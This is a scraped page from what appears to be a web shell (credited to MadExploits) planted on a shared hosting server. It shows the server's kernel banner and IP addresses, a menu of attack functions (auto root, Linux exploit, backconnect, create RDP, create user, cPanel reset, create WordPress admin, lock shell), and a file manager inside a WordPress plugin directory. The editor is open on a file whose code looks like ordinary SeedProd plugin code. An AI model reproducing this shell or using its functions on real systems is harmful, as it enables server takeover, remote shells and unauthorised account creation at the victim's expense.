Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.135.204.31
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
upwellness.store /
wp-content /
plugins /
coming-soon /
app /
[ HOME SHELL ]
Name
Size
Permission
Action
backwards
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
admin-bar-menu.php
3.95
KB
-rw-r--r--
bootstrap.php
20.46
KB
-rw-r--r--
class-seedprod-notifications.p...
9.63
KB
-rw-r--r--
class-seedprod-review.php
5.97
KB
-rw-r--r--
cpt.php
541
B
-rw-r--r--
edit_with_seedprod.php
21.61
KB
-rw-r--r--
functions-addons.php
17.51
KB
-rw-r--r--
functions-envira-gallaries.php
799
B
-rw-r--r--
functions-inline-help.php
5.3
KB
-rw-r--r--
functions-openai.php
16.53
KB
-rw-r--r--
functions-rafflepress.php
1.86
KB
-rw-r--r--
functions-seedprod-gallery.php
7
B
-rw-r--r--
functions-utils.php
258.71
KB
-rw-r--r--
functions-wpforms.php
1.6
KB
-rw-r--r--
import-cross-site-functions.ph...
3.2
KB
-rw-r--r--
license.php
5.43
KB
-rw-r--r--
load_controller.php
1.69
KB
-rw-r--r--
lpage.php
34.91
KB
-rw-r--r--
nestednavmenu.php
5.09
KB
-rw-r--r--
render-csp-mm.php
9.8
KB
-rw-r--r--
render-dynamic-tags.php
26.24
KB
-rw-r--r--
render-lp.php
1.15
KB
-rw-r--r--
routes.php
24.62
KB
-rw-r--r--
settings.php
4.9
KB
-rw-r--r--
setup-wizard.php
12.08
KB
-rw-r--r--
subscriber.php
2.63
KB
-rw-r--r--
theme-templates.php
39.34
KB
-rw-r--r--
wp-cli-functions.php
22.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nestednavmenu.php
<?php if ( defined( 'DOING_AJAX' ) ) { } /** * Ajax call to fetch selected WordPress inside seedprod builder. */ function seedprod_lite_get_nested_navmenu() { if ( check_ajax_referer( 'seedprod_nonce' ) ) { if ( ! current_user_can( apply_filters( 'seedprod_navmenu_capability', 'edit_others_posts' ) ) ) { wp_send_json_error(); } $navmenu_name = isset( $_REQUEST['navmenu_name'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['navmenu_name'] ) ) : ''; $divider = isset( $_REQUEST['divider'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['divider'] ) ) : ''; $layout = isset( $_REQUEST['layout'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['layout'] ) ) : ''; $walker_divider = true; if ( '' == $divider || 'v' == $layout ) { $walker_divider = false; } if ( true == $walker_divider ) { $args = array( 'menu' => $navmenu_name, 'container_class' => 'nav-menu-bar', 'menu_class' => 'seedprod-menu-list', 'walker' => new SeedProd_Lite_Menu_Walker( $divider ), ); } else { $args = array( 'menu' => $navmenu_name, 'container_class' => 'nav-menu-bar', 'menu_class' => 'seedprod-menu-list', ); } wp_nav_menu( $args ); wp_die(); } } /** * SeedProd Menu Walker Class for adding menu list divider */ class SeedProd_Lite_Menu_Walker extends Walker_Nav_Menu { /** * Separators value. * * @var string */ private $separators; /** * Create class instance. * * @param string $separators Separators passed to class. */ public function __construct( $separators = '' ) { $this->separators = $separators; add_filter( 'wp_nav_menu_items', 'seedprod_lite_remove_last_divider' ); } /** * Add/List separators. * * @param string $output Output string. * @param string $item Item string. * @param integer $depth Depth integer. * @param array $args Args array. * @return void */ public function end_el( &$output, $item, $depth = 0, $args = array() ) { $output .= '</li>'; if ( 0 == $depth ) { if ( '' != $this->separators ) { $output .= "<li class='separator menu-item'>" . $this->separators . '</li>'; } } } } /** * Shortcode to fetch select WordPress menu */ add_shortcode( 'seedprodnestedmenuwidget', 'seedprod_lite_wordpress_menuwidget' ); /** * WordPress Menu Widget. * * @param array $atts Shortcode attributes. * @return string $content */ function seedprod_lite_wordpress_menuwidget( $atts ) { $menu_atts = shortcode_atts( array( 'menu' => '', 'menudivider' => '', 'layout' => 'h', ), $atts ); $navmenu_name = ''; if ( isset( $menu_atts['menu'] ) ) { $navmenu_name = $menu_atts['menu']; } $navmenu_seperator = ''; if ( isset( $menu_atts['menudivider'] ) ) { $navmenu_seperator = $menu_atts['menudivider']; } $layout = ''; if ( isset( $menu_atts['layout'] ) ) { $layout = $menu_atts['layout']; } $walker_divider = true; if ( '' == $navmenu_seperator || 'v' == $layout ) { $walker_divider = false; } if ( true == $walker_divider ) { $args = array( 'menu' => $navmenu_name, 'container_class' => 'nav-menu-bar', 'menu_class' => 'seedprod-menu-list', 'walker' => new SeedProd_Lite_Menu_Walker( $navmenu_seperator ), ); } else { $args = array( 'menu' => $navmenu_name, 'container_class' => 'nav-menu-bar', 'menu_class' => 'seedprod-menu-list', ); } ob_start(); wp_nav_menu( $args ); $content = ob_get_contents(); ob_end_clean(); return $content; } /** * Remove last divider. * * @param string $items Items string. * @return string $items */ function seedprod_lite_remove_last_divider( $items ) { $substring = "<li class='separator menu-item'>|</li>"; if ( substr( $items, -strlen( $substring ) ) === $substring ) { $items = substr( $items, 0, strlen( $items ) - strlen( $substring ) ); } return $items; } /** * Shortcode to fetch selected WordPress widget inside Seedprod builder */ add_shortcode( 'seedprodwpwidget', 'seedprod_lite_wordpress_widget' ); /** * WordPress Widget. * * @param array $atts Shortcode attributes. * @return string $content */ function seedprod_lite_wordpress_widget( $atts ) { // Get the widget name $widget_name = $atts[0]; // Remove widget name from array unset( $atts[0] ); // convert string bool foreach ( $atts as $k => $v ) { if ( 'true' === $v ) { $atts[ $k ] = true; } if ( 'false' === $v ) { $atts[ $k ] = false; } //$atts[$k] = ($v === 'true')? true: false; } global $wp_widget_factory; $content = ''; // Check if the widget class exists if ( ! isset( $wp_widget_factory->widgets[ $widget_name ] ) ) { // Check update widget class name if ( isset( $atts['class'] ) ) { // Replace - with \ $widget_name = str_replace( '-', '\\', $atts['class'] ); // Check if the widget class exists if ( ! isset( $wp_widget_factory->widgets[ $widget_name ] ) ) { return $content; } } } $inst = $wp_widget_factory->widgets[ $widget_name ]; $instance = $atts; ob_start(); the_widget( $widget_name, $instance ); $content = ob_get_contents(); ob_end_clean(); return $content; }
Close